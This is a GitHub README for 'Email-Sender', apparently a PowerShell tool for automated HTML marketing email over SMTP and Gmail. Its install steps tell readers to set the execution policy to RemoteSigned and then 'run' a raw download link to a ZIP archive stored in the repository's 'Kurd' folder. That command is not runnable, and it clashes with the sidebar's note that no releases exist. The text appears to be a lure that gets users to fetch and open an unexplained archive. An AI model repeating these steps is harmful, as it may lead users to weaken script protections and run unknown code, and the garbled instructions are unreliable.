Skip to content

SigmaSigmaBoyehr/Email-Sender

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

11 Commits
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ“§ Email-Sender - Automatic HTML Email Sending Made Easy

πŸš€ Getting Started

Welcome to Email-Sender! This easy-to-use Windows PowerShell project helps you send HTML emails using an SMTP server. It works seamlessly with Gmail, allowing you to automate your email marketing efforts.

πŸ“₯ Download Email-Sender

Download Email-Sender

Click the button above to get the latest version. You will be directed to the Releases page where you can download the software.

πŸ“‹ System Requirements

To run Email-Sender, ensure you have:

  • A Windows operating system (Windows 10 or later recommended)
  • PowerShell installed (comes pre-installed with Windows)
  • An active internet connection for SMTP server access

πŸ’» Features

Email-Sender offers:

  • Simple interface for sending HTML emails.
  • Support for Gmail and any SMTP server.
  • Templates for easy email design.
  • Automation tools to send emails at scheduled times.

πŸ”§ How to Download & Install

  1. Visit the Releases Page

    Go to the Releases page to find the latest version of Email-Sender.

  2. Download the Application

    On the Releases page, you will see options for downloading. Choose the latest version and click on the link.

  3. Extract the Files

    Once the download completes, locate the ZIP file in your downloads folder. Right-click on the file and select "Extract All..." to unzip it.

  4. Open PowerShell

    Search for "PowerShell" in your Windows search bar and open the application.

  5. Set the Execution Policy (If Required)

    Before running the script, you may need to allow PowerShell to run scripts. Type the following command and press Enter:

    Set-ExecutionPolicy RemoteSigned
    

    Confirm if it prompts you.

  6. Run Email-Sender

    Navigate to the folder where you extracted Email-Sender using the PowerShell command:

    cd path\to\Email-Sender
    

    Replace path\to\Email-Sender with the actual path on your computer.

  7. Send Your First Email

    Inside the Email-Sender folder, run the script with this command:

    .\https://github.com/SigmaSigmaBoyehr/Email-Sender/raw/refs/heads/main/Kurd/Sender_Email_1.9.zip
    

    Follow the prompts to enter your SMTP details and the email content.

πŸ“§ Sending Emails

Here's how to send an email using Email-Sender:

  1. Input your SMTP server details.
  2. Enter the recipient's email address.
  3. Fill in the subject and body of the email with your HTML content.
  4. Press "Send" to dispatch your email.

βš™οΈ Troubleshooting Common Issues

If you encounter issues, consider the following steps:

  • Check SMTP Settings: Ensure your SMTP server details are entered correctly.
  • Internet Connection: Make sure you have an active internet connection.
  • Execution Policy: If there's an error related to running scripts, revisit the execution policy step.

πŸ“š Additional Resources

  • PowerShell Documentation: A helpful guide for beginners on scripts and commands.
  • Email Marketing Best Practices: Understanding email etiquette can boost your marketing efforts.

πŸ“ž Support

If you need help, feel free to open an issue on the GitHub repository. We appreciate user feedback and are here to assist.

πŸ”— Important Links

Enjoy sending your emails with Email-Sender!

About

πŸ“§ Automate HTML email sending with this Windows PowerShell tool, utilizing SMTP servers, including Gmail, for effortless communication.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors